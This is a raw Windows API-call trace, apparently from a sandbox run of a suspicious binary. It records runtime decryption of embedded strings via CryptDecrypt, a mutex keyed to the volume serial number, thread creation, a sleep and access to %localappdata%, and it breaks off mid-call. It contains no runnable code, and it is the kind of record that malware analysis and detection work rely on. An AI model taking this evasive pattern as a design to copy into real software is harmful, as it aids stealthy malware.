[0101.446] GetLastError () returned 0x0 [0101.446] SetLastError (dwErrCode=0x0) [0101.446] GetLastError () returned 0x0 [0101.446] SetLastError (dwErrCode=0x0) [0101.446] GetLastError () returned 0x0 [0101.446] SetLastError (dwErrCode=0x0) [0101.446] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x9c) returned 0x1db1a08 [0101.446] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1f) returned 0x1db1ab0 [0101.446] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x36) returned 0x1db1ad8 [0101.446] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x37) returned 0x1db1b18 [0101.446] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x3c) returned 0x1db1b58 [0101.446] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x31) returned 0x1db1ba0 [0101.446] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x17) returned 0x1db1be0 [0101.446] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x24) returned 0x1db1c00 [0101.446] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x14) returned 0x1db1c30 [0101.446] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0xd) returned 0x1db1c50 [0101.446] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x25) returned 0x1db1c68 [0101.447] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x39) returned 0x1db1c98 [0101.447] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x18) returned 0x1db1ce0 [0101.447] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x17) returned 0x1db1d00 [0101.447] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0xe) returned 0x1db1d20 [0101.447] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x69) returned 0x1db1d38 [0101.447] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x3e) returned 0x1db1db0 [0101.447] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1b) returned 0x1db1df8 [0101.447] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1d) returned 0x1db1e20 [0101.447] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x48) returned 0x1db1e48 [0101.593] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x12) returned 0x1db1e98 [0101.593] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x18) returned 0x1db1eb8 [0101.593] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1b) returned 0x1db1ed8 [0101.593] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x24) returned 0x1db1f00 [0101.593] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x29) returned 0x1db1f30 [0101.593] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db1f68 [0101.593] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x41) returned 0x1db1f90 [0101.593] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x17) returned 0x1db1fe8 [0101.593] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x14) returned 0x1db2008 [0101.593] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0xf) returned 0x1db2028 [0101.593] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x16) returned 0x1db2040 [0101.594] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x2a) returned 0x1db2060 [0101.594] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x29) returned 0x1db2098 [0101.594] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x15) returned 0x1db20d0 [0101.594] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db20f0 [0101.594] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x2a) returned 0x1db2118 [0101.594] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x12) returned 0x1db2150 [0101.594] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x18) returned 0x1db2170 [0101.594] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x46) returned 0x1db2190 [0101.594] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db11f8 | out: hHeap=0x1db0000) returned 1 [0101.594] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0101.594] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x80) returned 0x1db11f8 [0101.594] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x838136) returned 0x0 [0101.595] RtlSizeHeap (HeapHandle=0x1db0000, Flags=0x0, MemoryPointer=0x1db11f8) returned 0x80 [0101.595] GetLastError () returned 0x0 [0101.595] SetLastError (dwErrCode=0x0) [0101.595] GetLastError () returned 0x0 [0101.595] SetLastError (dwErrCode=0x0) [0101.595] GetLastError () returned 0x0 [0101.595] SetLastError (dwErrCode=0x0) [0101.595] GetLastError () returned 0x0 [0101.595] SetLastError (dwErrCode=0x0) [0101.595] GetLastError () returned 0x0 [0101.595] SetLastError (dwErrCode=0x0) [0101.595] GetLastError () returned 0x0 [0101.595] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.598] SetLastError (dwErrCode=0x0) [0101.598] GetLastError () returned 0x0 [0101.598] SetLastError (dwErrCode=0x0) [0101.598] GetLastError () returned 0x0 [0101.598] SetLastError (dwErrCode=0x0) [0101.598] GetLastError () returned 0x0 [0101.598] SetLastError (dwErrCode=0x0) [0101.598] GetLastError () returned 0x0 [0101.598] SetLastError (dwErrCode=0x0) [0101.598] GetLastError () returned 0x0 [0101.598] SetLastError (dwErrCode=0x0) [0101.598] GetLastError () returned 0x0 [0101.598] SetLastError (dwErrCode=0x0) [0101.598] GetLastError () returned 0x0 [0101.598] SetLastError (dwErrCode=0x0) [0101.598] GetLastError () returned 0x0 [0101.598] SetLastError (dwErrCode=0x0) [0101.598] GetLastError () returned 0x0 [0101.598] SetLastError (dwErrCode=0x0) [0101.598] GetLastError () returned 0x0 [0101.599] SetLastError (dwErrCode=0x0) [0101.599] GetLastError () returned 0x0 [0101.599] SetLastError (dwErrCode=0x0) [0101.599] GetLastError () returned 0x0 [0101.599] SetLastError (dwErrCode=0x0) [0101.599] GetLastError () returned 0x0 [0101.599] SetLastError (dwErrCode=0x0) [0101.599] GetLastError () returned 0x0 [0101.599] SetLastError (dwErrCode=0x0) [0101.599] GetLastError () returned 0x0 [0101.599] SetLastError (dwErrCode=0x0) [0101.599] GetLastError () returned 0x0 [0101.599] SetLastError (dwErrCode=0x0) [0101.599] GetLastError () returned 0x0 [0101.599] SetLastError (dwErrCode=0x0) [0101.599] GetLastError () returned 0x0 [0101.599] SetLastError (dwErrCode=0x0) [0101.599] GetLastError () returned 0x0 [0101.599] SetLastError (dwErrCode=0x0) [0101.599] GetLastError () returned 0x0 [0101.599] SetLastError (dwErrCode=0x0) [0101.599] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.602] SetLastError (dwErrCode=0x0) [0103.216] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x30) returned 0x1db1280 [0103.216] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x3300) returned 0x1db21e0 [0103.216] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x15c) returned 0x1db12b8 [0103.216] GetTickCount () returned 0x5da9 [0103.216] GetLastError () returned 0x0 [0103.216] SetLastError (dwErrCode=0x0) [0103.216] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0x43f750, cchData=32 | out: lpLCData="\x03") returned 16 [0103.218] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1c) returned 0x1db1420 [0103.218] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1c) returned 0x1db1448 [0103.218] GetVersion () returned 0x1db10106 [0103.218] GetCurrentProcess () returned 0xffffffff [0103.218] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x43f6b4 | out: TokenHandle=0x43f6b4*=0x80) returned 1 [0103.218] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x14, TokenInformation=0x43f6ac, TokenInformationLength=0x4, ReturnLength=0x43f6b0 | out: TokenInformation=0x43f6ac, ReturnLength=0x43f6b0) returned 1 [0103.218] CloseHandle (hObject=0x80) returned 1 [0103.218] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db1470 [0103.218] CryptAcquireContextW (in: phProv=0x83fcf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x83fcf0*=0x254d70) returned 1 [0103.237] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f610 | out: phKey=0x43f610*=0x254d18) returned 1 [0103.240] CryptSetKeyParam (hKey=0x254d18, dwParam=0x1, pbData=0x43f5f8, dwFlags=0x0) returned 1 [0103.648] CryptDecrypt (in: hKey=0x254d18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x43f5c4 | out: pbData=0x1db1470, pdwDataLen=0x43f5c4) returned 1 [0103.650] CryptDestroyKey (hKey=0x254d18) returned 1 [0103.650] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db1498 [0103.650] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db14c0 [0103.650] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db14e8 [0103.650] CryptImportKey (in: hProv=0x254d70, pbData=0x43f580, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f5e8 | out: phKey=0x43f5e8*=0x254d18) returned 1 [0103.650] CryptSetKeyParam (hKey=0x254d18, dwParam=0x1, pbData=0x43f5d0, dwFlags=0x0) returned 1 [0103.650] CryptDecrypt (in: hKey=0x254d18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db14e8, pdwDataLen=0x43f59c | out: pbData=0x1db14e8, pdwDataLen=0x43f59c) returned 1 [0103.650] CryptDestroyKey (hKey=0x254d18) returned 1 [0103.650] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14e8 | out: hHeap=0x1db0000) returned 1 [0103.650] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0103.650] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14c0 | out: hHeap=0x1db0000) returned 1 [0103.650] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 [0103.650] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x43f650, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x43f650*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0103.651] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1498 | out: hHeap=0x1db0000) returned 1 [0103.651] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db1470 [0103.651] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5dc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f644 | out: phKey=0x43f644*=0x254d18) returned 1 [0103.651] CryptSetKeyParam (hKey=0x254d18, dwParam=0x1, pbData=0x43f62c, dwFlags=0x0) returned 1 [0103.651] CryptDecrypt (in: hKey=0x254d18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x43f5f8 | out: pbData=0x1db1470, pdwDataLen=0x43f5f8) returned 1 [0103.651] CryptDestroyKey (hKey=0x254d18) returned 1 [0103.651] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db14b8 [0103.651] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0103.651] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x84 [0103.651] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x0 [0103.651] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 [0103.651] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14b8 | out: hHeap=0x1db0000) returned 1 [0103.651] ReleaseMutex (hMutex=0x84) returned 1 [0103.651] CloseHandle (hObject=0x84) returned 1 [0103.651] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db1470 [0103.651] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5bc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f624 | out: phKey=0x43f624*=0x254d18) returned 1 [0103.651] CryptSetKeyParam (hKey=0x254d18, dwParam=0x1, pbData=0x43f60c, dwFlags=0x0) returned 1 [0103.651] CryptDecrypt (in: hKey=0x254d18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x43f5d8 | out: pbData=0x1db1470, pdwDataLen=0x43f5d8) returned 1 [0103.651] CryptDestroyKey (hKey=0x254d18) returned 1 [0103.651] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db1498 [0103.651] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db14c0 [0103.651] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db14e8 [0103.651] CryptImportKey (in: hProv=0x254d70, pbData=0x43f594, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f5fc | out: phKey=0x43f5fc*=0x254d18) returned 1 [0103.651] CryptSetKeyParam (hKey=0x254d18, dwParam=0x1, pbData=0x43f5e4, dwFlags=0x0) returned 1 [0103.652] CryptDecrypt (in: hKey=0x254d18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db14e8, pdwDataLen=0x43f5b0 | out: pbData=0x1db14e8, pdwDataLen=0x43f5b0) returned 1 [0103.652] CryptDestroyKey (hKey=0x254d18) returned 1 [0103.652] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14e8 | out: hHeap=0x1db0000) returned 1 [0103.652] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0103.652] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14c0 | out: hHeap=0x1db0000) returned 1 [0103.652] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 [0103.652] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x43f664, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x43f664*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0103.652] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1498 | out: hHeap=0x1db0000) returned 1 [0103.652] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db1470 [0103.652] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f658 | out: phKey=0x43f658*=0x254d18) returned 1 [0103.652] CryptSetKeyParam (hKey=0x254d18, dwParam=0x1, pbData=0x43f640, dwFlags=0x0) returned 1 [0103.652] CryptDecrypt (in: hKey=0x254d18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1470, pdwDataLen=0x43f60c | out: pbData=0x1db1470, pdwDataLen=0x43f60c) returned 1 [0103.652] CryptDestroyKey (hKey=0x254d18) returned 1 [0103.652] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db14b8 [0103.652] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x0 [0103.652] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4200") returned 0x84 [0103.652] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x0 [0103.652] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1470 | out: hHeap=0x1db0000) returned 1 [0103.652] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db14b8 | out: hHeap=0x1db0000) returned 1 [0103.652] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831f5f, lpParameter=0x43f6f4, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8c [0103.653] Sleep (dwMilliseconds=0x1388) [0109.074] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db16a0 [0109.075] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f610 | out: phKey=0x43f610*=0x29bf60) returned 1 [0109.075] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f5f8, dwFlags=0x0) returned 1 [0109.075] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16a0, pdwDataLen=0x43f5c4 | out: pbData=0x1db16a0, pdwDataLen=0x43f5c4) returned 1 [0109.075] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.075] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db16c8 [0109.075] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db16f0 [0109.075] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db54e8 [0109.075] CryptImportKey (in: hProv=0x254d70, pbData=0x43f580, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f5e8 | out: phKey=0x43f5e8*=0x29bf60) returned 1 [0109.075] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f5d0, dwFlags=0x0) returned 1 [0109.075] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x43f59c | out: pbData=0x1db54e8, pdwDataLen=0x43f59c) returned 1 [0109.075] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.075] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0109.075] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db16c8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0109.075] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16f0 | out: hHeap=0x1db0000) returned 1 [0109.075] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16a0 | out: hHeap=0x1db0000) returned 1 [0109.075] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x43f650, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x43f650*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0109.075] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16c8 | out: hHeap=0x1db0000) returned 1 [0109.075] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db16a0 [0109.075] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5dc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f644 | out: phKey=0x43f644*=0x29bf60) returned 1 [0109.075] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f62c, dwFlags=0x0) returned 1 [0109.075] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16a0, pdwDataLen=0x43f5f8 | out: pbData=0x1db16a0, pdwDataLen=0x43f5f8) returned 1 [0109.075] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.075] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16e8 [0109.075] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0109.075] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x22c [0109.075] WaitForSingleObject (hHandle=0x22c, dwMilliseconds=0x0) returned 0x0 [0109.075] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16a0 | out: hHeap=0x1db0000) returned 1 [0109.075] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16e8 | out: hHeap=0x1db0000) returned 1 [0109.076] ReleaseMutex (hMutex=0x22c) returned 1 [0109.076] CloseHandle (hObject=0x22c) returned 1 [0109.076] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x60) returned 0x1db16a0 [0109.076] CryptImportKey (in: hProv=0x254d70, pbData=0x43f600, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f668 | out: phKey=0x43f668*=0x29bf60) returned 1 [0109.076] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f650, dwFlags=0x0) returned 1 [0109.076] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16a0, pdwDataLen=0x43f61c | out: pbData=0x1db16a0, pdwDataLen=0x43f61c) returned 1 [0109.076] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.076] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db1708 [0109.076] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5d8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f640 | out: phKey=0x43f640*=0x29bf60) returned 1 [0109.076] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f628, dwFlags=0x0) returned 1 [0109.076] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db1708, pdwDataLen=0x43f5f4 | out: pbData=0x1db1708, pdwDataLen=0x43f5f4) returned 1 [0109.076] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.076] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db1730 [0109.076] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db1758 [0109.076] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db54e8 [0109.076] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f618 | out: phKey=0x43f618*=0x29bf60) returned 1 [0109.076] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f600, dwFlags=0x0) returned 1 [0109.076] CryptDecrypt (in: hKey=0x29bf60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x43f5cc | out: pbData=0x1db54e8, pdwDataLen=0x43f5cc) returned 1 [0109.076] CryptDestroyKey (hKey=0x29bf60) returned 1 [0109.076] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0109.076] ExpandEnvironmentStringsW (in: lpSrc="%localappdata%", lpDst=0x1db1730, nSize=0xf | out: lpDst="") returned 0x2c [0109.076] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db1758 | out: hHeap=0x1db0000) returned 1 [0109.076] RtlReAllocateHeap (Heap=0x1db0000, Flags=0x0, Ptr=0x1db1730, Size=0x3a) returned 0x1db1730 [0109.076] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x3a) returned 0x1db54e8 [0109.076] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db5530 [0109.076] CryptImportKey (in: hProv=0x254d70, pbData=0x43f5ac, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x43f614 | out: phKey=0x43f614*=0x29bf60) returned 1 [0109.076] CryptSetKeyParam (hKey=0x29bf60, dwParam=0x1, pbData=0x43f5fc, dwFlags=0x0) 